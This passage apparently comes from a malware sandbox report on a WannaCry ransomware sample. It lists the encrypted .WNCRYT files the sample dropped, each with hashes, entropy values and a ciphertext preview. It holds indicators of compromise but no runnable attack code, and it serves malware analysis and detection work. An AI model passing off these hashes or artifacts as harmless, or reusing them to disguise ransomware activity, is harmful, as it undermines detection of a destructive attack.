Preview:	WANACRY!.....;.......8...../sbX.."....%..ipZL..W,.1/.:$i\|u.L;u...O@...(>.....5P}M.>.2\|.ER.........]E..1.\..K...2.P..+.J..V...\.......E...NfFp5.<5m....E...\|w.s%...J..5..`&..S.{.....:...C...d....QJi..r.p......(_....^Nb...JG.E...f.....z.5.=.]..n C.q...5.....uZ......x..+...H...#.+.a..\.O....b.O^.p....._._..S./\|......h........m.P..2.75.T..~..$..J.%9C........A..]\|..]..iG......1.J.Bf.gG."c..%.-.b.S..`.4z.~\.. .{...$.......p .@...3'j..<<{....e....CB.N.B.x.4;A.&81 /...j..........t...]wC..S2...a...6.#\"....K...Se...'6.{.."..2...y.2...#.....<.b....OqG`.......a...ZW`...1.AZi.B"...A.\.}QW...#,/..M{.x.S..W..u...?4......~......n1..c.....it\.B.F....S.c&.M..Zo.a...h.'.....K...D(.]....^t._....S...Z\KaK.-...sD.....T;..'.....s...g.:.L..].u.F..m...j.}.I..S..QF..'..^d{.\|../........i..j+.QV>.p..k..P.....M..~.4O.W.A..o......AgZ......d}...m..*d(..mJ...H.n2:.v...u....F.........>...<F..2..!.=..EE..._..........D.jL`Y.....'&.....?..n.32./y.M.....).....XmM

C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\5fc0968a.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5240
Entropy (8bit):	7.9640867686784445
Encrypted:	false
SSDEEP:	96:o1xBlcXjNLAE6ug8YHq4JWECEvp11B7bBgL871DSChZz0lCS4i/r1W/zoALk2mka:ClEjN7+WECmP9gmFRS4i/r1kc2m0fO
MD5:	32CD082C6D1CF2A6FD37549E920B4119
SHA1:	3ECED1EBF1D06AAD3C8718DC762F6D9AE9560D4D
SHA-256:	BC88E594C5CB54326EC4DD73CDFCE4F43A1DAA70D00DE5C004D0EB3C39463CDF
SHA-512:	E7F843724DE792139795715ABB69AC95CAF9357F46AD28E7A1BCDD8BBDECF9F2414DB28DA96956F7AD093DC54E5B773459BE5AF6943E922261D2B0B929C12A7C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....N.z...EA...<..<Q.K.).^.m..6.e'...D...q...g?.7.....(..y....z....:\/..M.E#j.>.......L-.O.F?mm /../..Y7.='.a.E.eedq...8....L......../K6KbK.xTn.K3..y..4.8......8...U...nl.in... ..<Oe...eA...~.s....s..[......./8.PV%.:..v.......G.b.G.:..JQ.)C...R.[.].Y..v.....X.........f.7bS......r..\v.....VW.....X..`..X.,.......L......tY.S.+....?.V.....kK.v.B...9.E.{.........y..a.J.b^........A)..LU'y 7..Ji{.......6m..?.=.IL.bR..u19...!`......n..BkV...Ww..q\OCj...5.......n.T'(..O.z.....9..1....Y..DI.(?.tN........:..:.4. #......?.RnZ5]\G{.....>..Y.1.P.&..~...O...<...gGj.8....W.7...Sa.%..-..PZ..T.O....7.'..'.KL.w...W'.w<...GF.`..l......r.h....lWT....\|..><..H...#.4E`..P...tLr%,....0BKF.\......T..{V....:..a.....j..6..y&......S}\|~~...`..\|f,...*.]...{{...>...6.c....v<$._ j.#.....:m.7.@+.Xf...`d.b.~....o.M..Dj^}...P<..bd^....m...5.n4..............KV..\|[.....~...#...>o............k^..O.e.SU.....p..Z....h...}......VrU...Q.x..\|g.;.....{...+Q.+.6.cE+.\|{..

C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\70af9816.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	9736
Entropy (8bit):	7.981696009699221
Encrypted:	false
SSDEEP:	192:L/U6gmIATwPUaXpReno23KE0YRlk7TMCCtKP3A1l7X2hP7p3gfr1gPm2GPC8i:L/S+oXXCo2xLusCCt687X2esGPC8i
MD5:	C536133492DBE36D6DEEF7CA7E5F5940
SHA1:	311BB116C5AABF3269BEACA044D715F7D6DC572D
SHA-256:	FBF107850451F50AC9B04BC8F27C8DB435F5B8BCF2F5DD1D7EB571139E329E3D
SHA-512:	6A15209B4528C32723EA4271D21F78D8E67511D1E3449465273245CD1895B56FDF1FAD4EE4681018BAB8A6BB6DA2DA61A4C9901DDC5E38102E8D997FE794FE21
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...............I.E...O..(.......S.n3.k.O.....N^..d4p......U1a#....1%..i.\|[?[...y ..(.3.;..+D]r>O.\J..X...1."..D.%u.../.A..6#....\|F.rAiK...../4....%.VB.,.#:Lj>z.....Kc.`@.O...#.....4.B.E...bY........\|..S..Os....Z......./.....i2../....`...^.~'.......$.......i.Ct.B73....V.v.VK.....`.KI.Q.)....F...I..vCeA...... 9\|t..3...gY&v..i...Y.H.p@..,...8.....p-.@.........x@...n....xt-.;.....siLW.j&..z....0R.g1.&..j.qN....C..jra.b..:...2....=&....L&...z.^..^.G......Q2S^H..;=.....:5.z...Z...P:9...V........WEh..;....w..].ji.M.....W..?..R.BJM...X.M+...p../.aqd..Kt.I..^.T4..\|.vW..e...6p`.5.1..J{'.....GIO.6.......X...G..../q\y.ft.R......z.0?..6.`.....q...r.4...G...eY.=.....W.....`=...k3!.d.(.g..........%$.....s/.yk.=.N.e.D'.j,....X....NJ......M.9.8he...=..[;m..I........?..C......x,......Tf.=.Q..1z...[......f$Y.Y...Rh.....b..Z..n8....IA^\j.M.. ~..7[.....4 ......cu..2...t....`$.1k.........d.C....i.U\.E6.2....2...e..2.>..".?......93....O.....cE'/.

C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\8fce0f3.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4552
Entropy (8bit):	7.95449897658305
Encrypted:	false
SSDEEP:	96:oAPIA6vg06Q94/HupTLeKyhpUtrzMCvEVnWoxx6h+Fvfu:yA696Q94/uvuhC5zMCvFSx6Y8
MD5:	CBF4B334FF837868D62DA2646110646C
SHA1:	46B61ABD3C46F72592DDDE91256B2A989CF52756
SHA-256:	EB2CC7D172E33D0F42631C50C79FF235A5A6A993518ABBA03430260E5953BAAC
SHA-512:	B8F30CC334BACCCF2EB20D484DDEE4C93422EF0F7C50BDA14B6BF7E1A0C1FD3E1AEEA9D4C60D56CF7814D28EDDFD9A07B7FAF2FE823E19FB94D305745C216338
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....f....).....p......(.1:...:.ut}..W....Q./.).@c.....H.Q.?......m.j$..j.<..H....H...Y.x.\|$....U.q...s..4..X. l..p.y...\|.....R...k.t.......X...<c..4.W}b3...G..... j..GGct....N..l...u$p@......\o0-O........,.S.7._a.-..Y..".J.."...P.?.#.=...z....uZ. .................t...%E.LL.b......e!T.F.....{.t.A...`......... +(....(b.G.g...F.TT.W2I..a^EV..{([7.y...>.....k .0.....B^.;.].w7.....q/...:&5Q.;K...3$..M..9V........E'\hD..E...z..V..F.o....z..Q.V..KVpo.t,....,..P.........k..j.Z...sX=....}E......du...<...jMa...P.e..%...`.GK.^...Q4.K.BE.j..z......G..j..<...b9.$Q..>.x..G..bUc6.{q.Ly..vq)@.4=.VA.5..q...g>.\....v.6dn.H.........../..Ky....a...k,.....gr.28...Z.m.{Z.4..U..(m/F..@V.......;m.a..Q....(X8.i.9C.i6...n@T..SW.bQwJ.J......n}...K.^.n.q..$.X...r.w.E-.....0.,.\|m...Xb.........XH9:..p^-o..OHs...,.>.:..%..Z.9...e.(K......_..efEbZu.......`'..W..a.wM$h...a.45.!d^c.^.\w7..v......f.*.....?.(..4...i=w0H!W..v..M...);]N%.....\|Qa.4../...[.:.......=h..ZX.....R.(...

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2097432
Entropy (8bit):	7.999918171130955
Encrypted:	true
SSDEEP:	49152:lrgYqJddfJjFyVKV3v0JuAC+k3otQBtqcO0War/L:lrYdfWIv0cAC+kWQBpT/L
MD5:	18510C402CDB49AD916FC4B1A66CF817
SHA1:	FF5C31E4BB514763DE41B25C8ECBB19944CEF7C8
SHA-256:	F955AAFE92F8D18466C17B6B4034B970093E61E68DAA0866F74B6A654A38669C
SHA-512:	0ACC28B11AAA6EAAC43A8FBD3E2E8B7884CB11261A9D362E64347E56F9013EE5EF3DC77AB9E4BF47AE83E7BE4361FA815DD861013A1ED881B50392608CA1F728
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....p..4.V....Z.J...^....V........A....P.a.>.\.'.;..e.f.N....N..!.U.^..Q>...RqGv.8....o..8B..p......eU...A..Q..{.2.....%...V#D~..?...y..^.u..aWJgN...O......Z..m^.<...2......&.}..><..q.C'......]W.....z..L.K"H..I..T/..J.O..I.UmV.P6...6.6W.p.X....... .......#g......NN.:_..Ny.G,(.`.l..].+k4.._.....>.f0.9..k.H..yr...j.Z.BfK0.C..."lY..X....S.h....s.u7.9..\....#g..]..k.k...:;B.D.+W..q...P....v.@f.b...1..xp..~..F.z.OW.2;.9.$;5...!t....&..t.JD..h.%....w....x..hG....F5.-C..u..TP./9...8..>i.c..g..a...p1PP......o..p....T~..m.....<...X.=.g...j.Z....(.6..!.5 .'....k.,..E.=4.)..)}.QB.".....]......Pw..~."....[....\.>..D..H.M4.....-2.>m.'.........}K.o.,..]R.3....p?)wu...H..ty.....C...G.-....J.4........%.?.......4}r..>..ue...`l(=A....nI.....9...tY2......B#,{F..cV......S..AXyw....%..$........-..5.P.)$.^...S.0.]4A.OS\|..`.$...ry...N\|\..,gYN9....a.[L..BH....=...9.>..K...x........O5D%.H...;hu.G._...?.{.:..-.`...}?............^.a.^.....`...3.e.

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\squaretile.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2680
Entropy (8bit):	7.931697752707506
Encrypted:	false
SSDEEP:	48:bklBBWrihhHFNIh9JNXtfF6sJ37P8QCIopbqUrfVqZ2aa3ApZTfGaMq+n/DEihNF:olBBDhtkJ4sJLmtbpropwwi/YiZ
MD5:	CBA5717E3A642537BABBA253A7B01BAC
SHA1:	F4E6CEC35E62B8C8256E31651A7B744A3044EA51
SHA-256:	EB9575381EC83CC2936E0F6D9E9B74A3002FBD3A2E60FF5FBD0343B51FB4897B
SHA-512:	7575E5907F383588620D806B039785F4D4262503B76CCFFE60AEC05677E7E9278E775315DD138135A540FEF4A80836D50B418EFC0161CD610D8D14678050CCDD
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........<h.W...J..k.X.B(.....IJV...Z.M.b}..B..uU..p.K.^..j.......W..}.G:......U..d..w....."KO.1%..e.:.+.....8..Ze>T.n...s....6....+tsz{.5.....j.A...zJ]..4...Fst.4.@4...~u._X..rh.T..q.QWb./....M\|o...})A.........tW&.L.jl6...>....U. ...IF{.=E..&...Y.3.\| w....Y...........].L.....V..5.NJ7.....K.....?.!..{.f..r.4tU.8.C...N.X. .<.K..........&...Ot.J..i....\r.&.<.C6..y=.T.~.....-_...U..t;.).M.`D.q.$..;S....S...~...6,C....L..%.e...i..sc.C`!..D.....o4...FXMm.>..<..9. .......z../..B.h.48..M..O......n....#.....).=..b4.ET...+.m.........!N......I.7...............n.........0.(..A....g.K....~....X.M.sh..'u\b.k..)a..9....zJ.p........K..zZ.\3(a...I...\|.me1.s....?...m.......1D4.D....ms....c.c..1..o...<..D.F$x.Z..?...CZ...n.....`.=..j._w..o..B!.Gc2[.......q$.]...W...1....F...cl...6....u.0k.. ...:V...>g~.Co.].C.......>...E..X............HO/......LS.x..h{#h.s..so._VO^........AWIa....0.....x..%x..V..FA%L...I..AZm....}r.B...b................hj%v.<s.S[>o.Z./Q^

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\tinytile.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1912
Entropy (8bit):	7.897551521803568
Encrypted:	false
SSDEEP:	48:bkBFAYsk/nEh3NBy+yiYRgfUVlk2CX9Vk+OeHXeF:o7AY4YliYR+UVlk2q6+OgXW
MD5:	AE913A66926F3838A067A21BC602CE54
SHA1:	5A269C69A7745EE4577C01161C17B23F742E0F72
SHA-256:	809EBD104104889F6DB41BC1C4678116321DB5F09F0DB054A4F3FA9284509EBF
SHA-512:	18D41E9792B628684C07C8BB88F0FE67C7D5C20B939B884083A00B883E0460C9103DDE322DBEFD2557305E240FAC91E1A045151EE5A021BF26EAE92C5022730E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....R.R1....dr]..M.o.3.0_.L../.pEy..&..j../@.p.iu.A.....j..`4..4g.....6h.@.0.....g...\W(.p.<@~.R...g. ..-....=k[C.N. D...r.>{.$/h{M.Q.S.4T....d..B(...I.M.I...pB.......N@...........db...../Yp.d-.\|8aaD.!J..O..1Vf3 ....I.Z8.D.._G.}.o#..L#..v..F......[.......PuC..U.....g8..o....^%v...)X..C...o>m.W.Od...p....`U..2...4JI.t...MO..~Su...&.E....c...J?.]...u=.. Zs..... U..u...n4\|``/..k.....g...XqD3x.P..].!V.Ou`.?.tc..f.]a.E....nn..F...:.-1.......!q..n..b.!.w.q.$.(..[a"..y.3.......#..DR..Lu....-..T..^.RE\|XN.yU.T...?........$.U.\|.B....#..@....R...3.+.X...f.bZ.......6..v..w&...g0......._............X.\|........Za...........yJ..c.uKk..\a\.,...J.._h8.QN..VO.G.5x.......:.......-.B...A..7.Yn.r...p..IYB..D_5.5..... ....V...i.?:..p.Ywh.M.q.>.j.Q]."....2.y.6...$..?n...a......^.m...2..{L..x.4...-.i..@hp.Q..y..L...p..fc..8<.o.b..Y.4y...PDJ.4$.....\..I ....$.!.E.....+.*V.1.E..,.T.P...T.a`na......rk.S.Fw.-\'.Uv...f.]+?&5...dr/...k(..mq..}.

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2696
Entropy (8bit):	7.92223287429283
Encrypted:	false
SSDEEP:	48:bkuuOEqldsml9v8Doq4ewleu3VBd/IQMpeEr1qGPNLOicLPBH1UvZl3Z6Szr:obOtfsml9vsouwleu3VBOpeEr15LOVL8
MD5:	598D133262FBB434A4383294E20C0434
SHA1:	4BDE98F3B642E9E781BAC9D7524CB120004C4292
SHA-256:	EBDDEF8A654B4A97FBD78650F4B81B145144BA27FD41213AD9601AA1B630C3DC
SHA-512:	922D58D866328FD192439EB9FD4A2688A1E8BE212A5446BE56D4F442228BFAB8C1573F6C078BB8EA46682355CC8AB6EF3F85C1CB211577A717EEF9BF2D190411
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....y...i.2...[.......i.x\...N;.XJU...l\|Od1....\\.[."....$..U..-.. B.._C.@D.G...(i:Z6..i<Q.!?.+.g..._v(.N\|...=s).6.!..y..".d.g.2.oU..IV/.r..9..X...H.~.CZ.3?oLy2..._.H~......v.Kw`Q.A..-..dv.A.Z.I..!.#....+1..2.D.W...(.H.c...)......./.w^..V.#../..........a.......U.V....+.LM\z..........m..Q....L.x....W...e....h.W...j....&4..Py.o.A.+.G..X...=..^seH(....\.b%\|.......4X...cV..kP...v....K.=.Z..[r.....}.G....]9.l.8...GX.x0......".#.<...h.6..]..`s...a.....i.D.E...>.I.......%.5E<.w`.`.ku&.....L...w.-uQyy.Rr........A.;Og..8...h......FyZ..../..wcs.Y3......T.S.sP.\|S=&\.k.....@...Y.7.{.Q..,;Qe-Q..@.~P..k......$$ni.\|..r..M....W.V..c.Q...KcJa.....c`kdGO..3..e\/..0}.....+.%.<ro..\..m.!s.....S.....=&d..u...Q@.v(.]..zck..n...Y_.......l............K..U.....-.w...y....m.....s.-u...9I.geo...cE.-.....E.3.......6.A+h...#.....p.=.o.W...y..s...R.!s.6L..1V..o.@....M.....;.Cl.../G....`..5_..Y.UE.;v.q.K.G.W`.Q..#3.s..$..;p...eP.e..$.}....~.-.f.q..o..<.S%Q../...I:

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\tinytile.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	7.892302736121747
Encrypted:	false
SSDEEP:	48:bkJU6rVuaJ7prIO1WSdwiPsPHw0JIQ8PWDBvlLwjBR:oe6rYq7zddwi0ocI1W1qjBR
MD5:	8A12DF6F9235029255C33DA2F2FDE721
SHA1:	216980B3749E57F2659BFC01CA62F796D94135C2
SHA-256:	143E9DB8A687FB6FAFB18C66AAEEA6126C4F55D708625C8FF49221E2B3058F15
SHA-512:	5AF6F8BE71C67FFAD97525A5EB1079D5707FAFAC93070B5DE411A9B4F4F8520A00BC8F9DB25B1CE613EA650F20292C010072D92F346CD7676F4647083A8D8E2A
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........b0..=9.V.E.oQ0.a.[...n..._WD..0..Z....D...$".r6....~.$.b..@.S+D3v..Nr.\|=7....7.T..k...s...')..S...#.....p..sk.d.6....S.[7n8.l..,..9?..Z...../F.i0..Ua.[,..L0X..<.t.6.X.hq/...x=...H.:.~...#..3.'eYc]...-f@_..2T..I./3.Q....A. .....cen.s.9/9....y....).......@9.%.,.9.!..n...........F\.....3...p...2...../.K<..w%a..."K.G..+P.{.D...z........9b...:.Sz.......e..'...>0...q.....V......Q.....X........5.@..n.~..;..=.........w8.1.1............2..nfY.?T\+......}.{H.C.i.........0.b.W. G......bPg$"..W..x"b..}?>C..YF..yS.Ux.'.Bg..e..,^.Y)...l.......~..j....vC...xM,5O.k/..3!.a...d5.......G..`....I.B.qK..I.l.U...e.B....m.....:.;". D...(G..L..w.;R.W.y..8.&.....[~......:.V6.B.0...q.....mvl1....!.($.....(.u.g..N$.K.t.YT..S...Rw......C:S.G....v3k-.M.hTBa.a.......-.V..z.@....9..N0\.....s(q.....\....X.......t.+wG....J...4...6..Q...3P..O..dX....Y^.U.Q.WW.._..\IM..Z..83..j....Uj.K...d?...X.T.R..^%.<...1...n...t,......S.+1."V..a..sS..&9.. &xA

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1848
Entropy (8bit):	7.896395926166818
Encrypted:	false
SSDEEP:	48:bkny8DZsm7Iz6JCpMRLf+27CkNA1uZVIcL5gty6xPo:onTDZs41+29VIuyo
MD5:	91A4B9F0CDC1DCDE5F3B6676800BA597
SHA1:	ACF71A58FD7AD35726CDC99112A278BD76D862FD
SHA-256:	DCD595F2A64F708448A7E9BB4D071F72766169193B49411ABE827FF546807FFD
SHA-512:	D8CE7F65D4A5A39EE84B42BD44D8AD083FE8CE9D195238C3AA064D599982C3AEA909309DD88AA8B556D0BB365ED9C5DF254D7EB11F0959A1B3B5FE50B9949D8D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....=..%M..T[.}.fL...W8.\~..-W....r.?.........M.S.(.H....?\|.....c3..x......s..!....e'u..ZS.%<.M...t.P...,.b.Y..Tw...5......u7....8T[..Y...\.-:&.sn...M.2.....6...V..1r.IZ.....=...G. ....&6.......j../gK.f.-.y..+:.5IU...X.q.!...z#1F<.t.ber.f=C.%.................'32S..x}.....$......PO&.E.u.Z.._D:......A.`O.fq.w~\|H.:...dP.f.@x._l.......y.\O.....>....~u.N@./q..`.A+.9..}.....T..............Q...=....-....=7.H.v.a.p..r.i..i....mSh.`w.......F..D........:=.....6......B.8..A-.F)..VnA.....-q.....EQ...[t}r.B.1'/.8.X!rc\..."..g.~ .ny.).. cu6.1..H...hZ..F..id.. .i..Y..jAE*X.d.....l.#.Y.....a).EI...#....V..Y.7.r....k...dSqe?A.HO.{.e...............q..C=....Fn..pR.2.W_3gRd...u....+O..H3.#.....H..(..f.>u..........8......k..x...&.nHOM....2..\|Xde.p!.6.t......Qx...X^...H+@..R....g......=.w.6.X.........K..8.d..a?.kr..Ry.tc@(.U...-?i.....n`....!....]vs.m......z..z...e..2........Y-Z<4.",..s..pz...F.Z....VI .......s.K........Hk.......,\O....:.

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\tinytile.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1400
Entropy (8bit):	7.845722432292195
Encrypted:	false
SSDEEP:	24:bky3NdWnxOKpFidye22zN7L/82h0rbY9De1eSH7QHIn0hbspwR7iM6W76yZLxqJC:bkgNAx7Fi86N7D80g89e5MHM0hbs66Gt
MD5:	EF3CC2450AABA5680E8C918EB648824A
SHA1:	807C6CAAF211B268D818604E40B23AB941336F51
SHA-256:	6FDFBBAEE67A92D6E70563E911A21075E65E54933E07F14A28A7134FFC208765
SHA-512:	7003104A9DABB834AA251D74A6CD987663722F129ED7AF970DEC7C38EC3E52838306AB0BF95A875806A4E2E056C29EBB1D136F1EE84343585F08F47D61E6C376
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....$Oy;.r....O..\|..po5{...>..\|_o(.\.....k.@_.X.B........R.z2xuN....P.%.q/.Fk..!-..3...{.{...,....vV..$.(..z.fR......G.....].....7%O.8....-w..KY../.XZ."...W.E...(."...6.W.#..h."..........x2w....P.....-(#.>.=...d.-0..A.....c+..........3......T;.P....Y........i.2.j\t._{..~2..[..v.s..T\z.{...!....^7.Y.;.3.A...A....zSc...).3").4..3....[Yd.m.z......&B.{z.z].v...C}.\|5..Qu.V_...`[o]M..h.h....H./V...?.}..=......p.X..%..Z...%....0..%.U..n."..N.Z.$.d"-....`.}...!.\...[M.!........o..9......{.u..P.R..tO^..`.v.R.xF~..5.if..d.B.:.WS....h.......}.p..........4.s^...2<4....vfm.7...J.9!...P.t...~.&...JO..4:b..a.Dx...vK.{z#..y....Qd&.+b.....Vo.&<.]L...8.....R^../.H../.x.~.s....88..8..Q_..............S.[\){.jq0.[unH#.o`...]...lE../mBa+s.>.)t-.C#...\|O.1cZ .p.w.*...N.(..."..C.....k....@...z.HX......'G. ..&S.l.i..6W._`94....5.t..1.....F7xX.....6x.#"...H.54..l..{...)a....p....+.k{.G9.;..\.xl if........!...%6@..6.q...#..S0.......M.'..VLs.[.Jp...KVdd,.[..l

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\squaretile.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1736
Entropy (8bit):	7.8842432165183824
Encrypted:	false
SSDEEP:	24:bkjvNEAV5fr2mxyQ7+3h77ZvR+TdVA9E9Z3qYAsYNFqtARzGa7FBNQ1vank24aeN:bkjlEq5fHQdJ7dRVWZ3pARcARd7Ff/YN
MD5:	820826834066E6C18305439CE9D49885
SHA1:	46F438948C721C2C20FD7ABC087204E33EC81D42
SHA-256:	51D12C39ABBAD7EA28540B6551421E800A2255AEA0E742EE5B23514AD037A1C0
SHA-512:	CFF1FF59E195AAFC3C0DB172AED154E49B8289F4CD969507DE284D88E8CBCAE3630EDBD8AC5E0B5DDBC6C260CEF88E124FA3BDE41C83B03F971A10360C03B131
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......kc..7.KYrB.K.?.:.h..n...]...J....>H... ..wQ.e..d.j6n..z.^.w....{...-...j....4..J2.q.I.'J{../(./u.c.t..g.ra....p...9.A.zbR.HUz....+...Y..8..VMO.`[.?....@C.\|zCDW.....T..;.S..C..6...>l............0(6>.8..U]w.....Q[p8......m.km.....4..s...^..n...............5.<.x..}S4D...@Z.[......B..[.QJq.i._.c....Bs....K...........KS{.#.o..........X.Q..5.dn.&..T..:...$N6#tw.....M+..$..;.>.SO.i....P..J+.......>(;......cik8..:nv .kfn..<Nh-....&..Md.JP..#.....8.+89j...z.A...\.?m.A6h8e._...37..Ey..!.F...`..Y..\ N7..O.j..+...k..J,YB..'.5V.........y..E.....R:..a./.....n_...7U..O.h......_...=gr.VN.@....\|.9....z0..X4}.U.^.?]o}).@0.,m.O..,+.O:.....+.0U..)...).\......?....BI<.....8B~VhyW....n\|.@...r...o9..7..A.~...'.){..-6........>S,..N..L.Rb.wf........Y....H..;t..d:......LQC...G..:Ui..-...BO.l.s..Wkbc...>.].j.nuy...A.;@...;T.S....9........R.\...y.S...>3z.,..u%p@...)..+.q=..h/e!....N...'K~....";..v......'.?.....pr.....y...7....]o..Yf.!..f\|..C..w..q.E.

C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\7603651830\tinytile.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1352
Entropy (8bit):	7.843715708551207
Encrypted:	false
SSDEEP:	24:bkmQpHbXMam5JUlzvYegFX4yZI5qF87rPl4Qeg3bzn98DfYQmt89srkeW9/lGZ:bkm2XJQegFIyZIgIp4QvbSrBmtnrBZ
MD5:	D836FF280FF00D56742AA495233C2E32
SHA1:	2207ADF962BC82EFFC9894ADF474EE71A9640C32
SHA-256:	A5F3105703A00B00F62071A8A4398EA624131706142852FCFAFBB4234AE096AC
SHA-512:	2D33F80C375D23B7E23E43591FAD5CC6A5E4CC1CF70FF91B2D31F32791762B79D39F19678D21C804CE7A05B872A3E9AA66D526DE413596157F49136F4957C6C5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....Pe.w.e;a!...?...HS.3.-6.....Zik.+.o.N&....d...g..{..D.6M)oM+..m.r.H.s...O...kd..?..@b....7)..s....Cs<w...$}2.?.A....uIH..E.e..C+...u..G..e....=@e......~..%w.6.6.?3+...$e.....D.......].B,..7.G.2j...GD...o..f..z.u@.o^=..3%...^,..J.Q.[...7B....$.........F..D/yvR.k.K.0..F 5... .]'.+..@.,....7./8;.".X.Y...X7\|.AH&....o~.`.}./.R.4mm......"..5..J....{l..<.. .:.K4.C\|.P....w.Z.B.E.?..!84..CM$.7.1...%+.........utsUc...YkN+1...I.Ynd.......p"[o.r_....E...F.m...'..?q.[..H.....[...D..Ci..1';....%..O..........n....Ym....w.d.e..iX..z....W.m;.(....TSr..]....:....9.\.8.0(..\|#.x....j..0.....SE....A.=?\|.p..w`..2...}Wn..;..(..q.X....]......+.J9~J.(>../..H0.X..M........s'./..$..#B...\.w.b.hw....nD.v".....+.....?.i^..5Gi\|.]?,.#.zQ....Z1g.q.X.......l'dl......W]....f..rwAwCe.+.V....4Q`L%.H].C>."n...\|u.]J.......O......#J. ..i..+../.k..i...c,.- p..o...A`....<2.,..-/`.B.....4.t.N+~.d.......&..e.....!..........g..S....x:2...>6....RA.\s.R.....tyV.

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask01_20_08_51_44_0048.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	872
Entropy (8bit):	7.718466755761935
Encrypted:	false
SSDEEP:	24:bk23QyQesV3ftJ9CmDPa+az8m/9hgkM5oB/V8ZZR2:bk23LsHzlDVaF/9uk3B2XR2
MD5:	0ED8BD299D4241D5E4B13E16B93C660E
SHA1:	42941D2988E87F58DF4396D8A702FA36D7910C47
SHA-256:	976F3DCA536C9E1ED18CC786D7844B3B2594580BC898AE3E17CA861BD0E0BBE6
SHA-512:	A67C7826591F4E4D5FE95BD9942B0575F58B3723064E14A8E73D7B57A56D698E3B811F619BCBC6FDDD37E28A969D6E1AEA51E3C0117424F6CAF8B52A852DE634
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....`...Gl..k."......m.A.f\....Yq..x.]..sL.Q@e.X~Orn..Ff.'G..i9..4...E.$Hud...e.w...7.....Y"..~QGz4.. .^2K...Tn..O.".i........./.h.'#.+?p......4....Y..p.:.mj...lh.]......"...[`.../D&..{#6c0...9jJM.g......J.......2.9.Q..6W....&Xt8..[..On....^F....C........f.\|..2..qG.....$.......E.a......Xm_..w.e.I....a..HHs.....Z..es...9.=}/g..DQ.mq\M..H..v./..phG...]..c.0..............G.3...j.l......f"......'{..gR..H....bp..U0.`.(..-;..PB..F:l.=.)x.I..N....o....Km..@$...^+V...<.....&.o...%.+G...?.o}..k.fdk.C$G\|.F..D..\|.. ......~...,..Z..0.....k.....k.Dn.m......vztn....M.c..}.?.p._.~.....;..........'.......6l...at.-..O<.<51.p..&Tx<..,..1]..Q[I.ii...#VD.F.......z.g..gM.F.O..../.P?1...v..;!...v.Z..#....}An?&w-..e....T.N..T^..a......5u>...cz.R..[g.....j..q...M..U..\....8.jo.Ug`.&....G^...n...fRVR.^.0..!..m..W......n.g_R

C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask02_23_14_01_00_1738.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
